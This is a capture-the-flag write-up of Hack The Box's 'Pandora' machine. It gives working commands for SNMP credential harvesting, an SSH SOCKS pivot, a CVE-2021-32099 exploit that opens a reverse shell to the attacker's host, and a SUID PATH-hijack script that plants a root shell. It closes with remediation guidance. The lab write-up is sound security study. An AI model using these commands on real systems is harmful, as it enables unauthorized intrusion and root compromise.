Pandora writeup
Box name: Pandora
Difficulty: Easy
OS: Linux
Overview: Pandora is an easy rated Linux machine. The port scan reveals a SSH, web-server and SNMP service running on the box. Initial foothold is obtained by enumerating the SNMP service, which reveals cleartext credentials for user daniel. Host enumeration reveals Pandora FMS running on an internal port, which can be accessed through port forwarding. Lateral movement to another user called matt is achieved by chaining SQL injection & RCE vulnerabilities in the PandoraFMS service. Privilege escalation to user root is performed by exploiting a SUID binary for PATH variable injection.
Link: https://app.hackthebox.com/machines/Pandora?tab=play_machine
Machine IP: 10.129.69.134
Ran rustscan against the machine
rustscan -a 10.129.69.134 –ulimit 5000 -b 500 — -A -Pn

Navigated to the site.

Added panda.htb to /etc/hosts. Ran feroxbuster and ffuf. Feroxbuster is only showing /assets currently. Navigated to that to poke at it.
feroxbuster -u http://10.129.69.134 -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,html,txt,bak,zip,json,xml,py,sh,config –force-recursion -t 50 -d 4 –filter-status 404,400
FUZZ.panda.htb” -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -c -fc 302

Found nothing important there. From Wappalyzer I was able to find out this is built on WordPress but there is no /wp-admin. Feel like I’m running out of options so I scanned UDP ports as well.
nmap -sU –top-ports 100 10.129.69.134

SNMP is open. Ran snmp-check and we get a bunch of information back.
snmp-check 10.129.69.134

Theres a mention of a Daniel as a contact.

Looks like an MySQL server exists. Also ran onesixtyone.
onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt 10.129.69.134

Found nothing else interesting from this output. Ran snmp walk.
snmpwalk -v 2c -c public -m all 10.129.69.134

Eventually we found these credentials. Tried these credentials on SSH and it worked.

daniel:HotelBabylon23
There is a second user on here named matt.

Did local enumeration. I found our next step but not our step to matt.
find / -perm -4000 -user root 2>/dev/null

Ended not finding anything with manual enumeration. Ran linpeas and found this.


I was poking at the pandora database for a while but couldn’t actually find any credentials. During this I realized that this webserver is different than what we saw earlier when navigating to the page as the original page was static.

Port forwarded with ssh since its just a single port.
ssh -D 8888 daniel@10.19.129.69.134
Navigated to the site.

At the bottom it looks like we get a version. Did research and found this exploit https://www.exploit-db.com/exploits/50961. This is authenticated though and we don’t have credentials. I tried a few I thought it could possibly be but no luck. I ended up finding this as well https://github.com/magicrc/CVE-2021-32099. It looks like these are chained to get authentication and then a shell. Used this exploit and I was able to get a shell as matt.
python3 -m venv .venv && source .venv/bin/activate && pip install -r requirements.txt
export HTTPS_PROXY=socks5h://127.0.0.1:8888
export HTTP_PROXY=socks5h://127.0.0.1:8888
python3 ./CVE-2021-32099.py –target http://localhost –lhost 10.10.16.27 –lport 1338

Got user.txt

Stabilized shell. When I tried to run that interesting file we saw earlier we get this.
/usr/bin/pandora_backup

This looks like it is attempting to use tar. We can path hijack to write a rootshell instead.
export PATH=/tmp:$PATH
cat > /tmp/tar << ‘EOF’ #!/bin/sh cp /bin/bash /tmp/rootbash chmod +s /tmp/rootbash EOF chmod +x /tmp/tar
/usr/bin/pandora_backup
/tmp/rootbash -p

GG

Attack Chain
1 – Reconnaissance
Ran RustScan and identified ports 22 (SSH) and 80 (HTTP). Added panda.htb to /etc/hosts. Browsed to the site and found a static page. Ran feroxbuster and ffuf with no useful results. Wappalyzer identified WordPress but no /wp-admin existed. Scanned UDP ports and found SNMP on port 161.
rustscan -a 10.129.69.134 –ulimit 5000 -b 500 — -A -Pn
nmap -sU –top-ports 100 10.129.69.134
2 – SNMP enumeration and credential discovery
Ran snmp-check and snmpwalk with the default public community string. Output revealed a contact named Daniel, a MySQL service reference, and eventually plaintext SSH credentials in the process list.
snmp-check 10.129.69.134
snmpwalk -v 2c -c public -m all 10.129.69.134
Credentials recovered: daniel:HotelBabylon23
3 – SSH access and internal service discovery
SSH’d in as daniel and found a second user matt. Ran find for SUID binaries and identified /usr/bin/pandora_backup as noteworthy. LinPEAS identified an internal web server running Pandora FMS. Port forwarded via SSH SOCKS proxy to access the internal service.
ssh -D 8888 daniel@10.129.69.134
4 – Lateral movement – Pandora FMS SQLi and RCE chain – CVE-2021-32099
Navigated to the internal Pandora FMS instance via the SOCKS proxy and identified the version. Found CVE-2021-32099, a SQL injection that chained with an RCE to achieve authentication bypass and code execution. Used a public exploit configured to route through the SOCKS proxy and obtained a shell as matt. Retrieved user.txt.
python3 CVE-2021-32099.py –target http://localhost –lhost 10.10.16.27 –lport 1338
5 – Privilege Escalation – SUID binary PATH hijack
Confirmed /usr/bin/pandora_backup was a SUID root binary that internally called tar without an absolute path. Prepended /tmp to the PATH, wrote a malicious tar script that copied bash and set the SUID bit, and executed the binary. Ran the planted rootbash with the -p flag to obtain a root shell. Retrieved root.txt.
export PATH=/tmp:$PATH
echo -e ‘#!/bin/sh\ncp /bin/bash /tmp/rootbash\nchmod +s /tmp/rootbash’ > /tmp/tar && chmod +x /tmp/tar
/usr/bin/pandora_backup
/tmp/rootbash -p
Key Takeaways
- SNMP default community string exposing plaintext credentials – The SNMP service was running with the default public community string and the process list visible via SNMP contained daniel’s SSH credentials in plaintext. SNMP must be configured with a non-default community string, restricted to authorized management hosts, and migrated to SNMPv3 with authentication and encryption. Credentials must never appear in process arguments.
- Pandora FMS SQL injection and RCE – CVE-2021-32099 (CVSS 9.8 Critical) – The internal Pandora FMS instance was running a version vulnerable to an unauthenticated SQL injection chained with remote code execution. Internal monitoring platforms must be kept fully patched regardless of whether they are internally accessible, as a foothold on any host provides access to internal services.
- Internal service accessible after initial compromise – Pandora FMS was only accessible internally but once daniel’s credentials were obtained the service became reachable via port forwarding. Defense in depth must account for attackers pivoting to internal services after any credential compromise.
- SUID binary calling tar with a relative path – The pandora_backup binary executed tar without an absolute path, allowing PATH manipulation to substitute a malicious script. SUID binaries must use absolute paths for all system calls and must be reviewed for PATH-dependent execution before being deployed with elevated permissions.
- Credentials in SNMP process list – Process arguments are visible to all users with SNMP or local access. Credentials passed on the command line are a critical finding as they are visible in process listings, logs, and SNMP output. Use environment variables or configuration files with restrictive permissions for credential passing.
Remediation
[Immediate] Harden SNMP configuration
Change the SNMP community string from public to a long randomly generated value and restrict access to authorized management hosts only via ACL. Migrate to SNMPv3 with authentication and encryption. If SNMP is not operationally required, disable it entirely and block UDP port 161 at the perimeter and host firewall.
[Immediate] Patch Pandora FMS to remediate CVE-2021-32099 (CVSS 9.8 Critical)
Update Pandora FMS to the latest patched version immediately. Restrict access to the Pandora FMS web interface to authorized management IP addresses. Place it behind VPN access if possible and require strong authentication on all admin accounts.
[Immediate] Fix the SUID binary PATH dependency
Rewrite pandora_backup to use the absolute path /bin/tar for all tar invocations. Audit all other SUID binaries for relative path calls using strings and ltrace. Remove the SUID bit from any binary that does not have an explicit operational requirement.
[Immediate] Rotate daniel’s credentials
The daniel SSH credentials must be considered fully compromised as they were visible in SNMP process output. Rotate them immediately and audit all other accounts for credentials passed as command-line arguments in any scheduled task, service, or process.
[Short-term] Prevent credentials from appearing in process arguments
Audit all cron jobs, services, and scripts for credentials passed as command-line arguments. Replace command-line credential passing with environment variables sourced from a secrets manager or configuration files with mode 600 permissions. Monitor process listings via endpoint detection for credential patterns in arguments.
[Long-term] Implement network segmentation and internal service access controls
Internal monitoring and management services must be isolated on a dedicated management VLAN inaccessible from general workload networks. Require VPN or jump host access for all internal admin interfaces. Include internal service enumeration and SNMP testing in the regular penetration testing scope.
Leave a comment